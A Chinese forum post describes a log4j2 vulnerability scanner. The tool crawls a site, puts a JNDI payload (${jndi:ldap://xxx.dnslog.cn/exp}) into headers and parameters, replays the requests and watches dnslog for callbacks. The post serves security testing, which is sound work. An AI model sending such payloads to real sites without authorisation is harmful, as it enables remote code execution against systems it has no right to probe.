[SAFE-ID: JIWO-2024-3063] 作者: banana 发表于: [2022-04-06]
本文共 [258] 位读者顶过
-
程序的工作流是利用rad爬取网站所有链接
[出自:jiwo.org]
-
替换值为log4j2漏洞的payload
-
更改请求中refer、agent值为payload
-
更改GET型请求中'='号后的值为payload;
-
更改POST型请求中data数据包中'=''、':'(json格式)后的值为payload
-
将替换好的请求进行重放。
-
如未定义payload, 脚本将自动从dnglog获取并定义未${jndi:ldap://xxx.dnslog.cn/exp}
-
如果是采用默认的dnslog为接收站点,那么将每重放十次检测一次dnslog。(考虑dnslog请求太多会被封禁)
-
如自定义接收站点,将不进行检测。
运行参数
-
需要注意的是,必须安装有chrome才可以运行,不支持firefox等。 如chrome不是默认位置,须在rad_config.yml文件中指定chrome路径。
-
payload值默认自动从dnslog获取,但是因平台问题无法访问时,程序会提示错误。用户可以自定义其他站点或ip,如http://ceye.io/
-
工具地址
https://github.com/zongdeiqianxing/log4j2-scan
|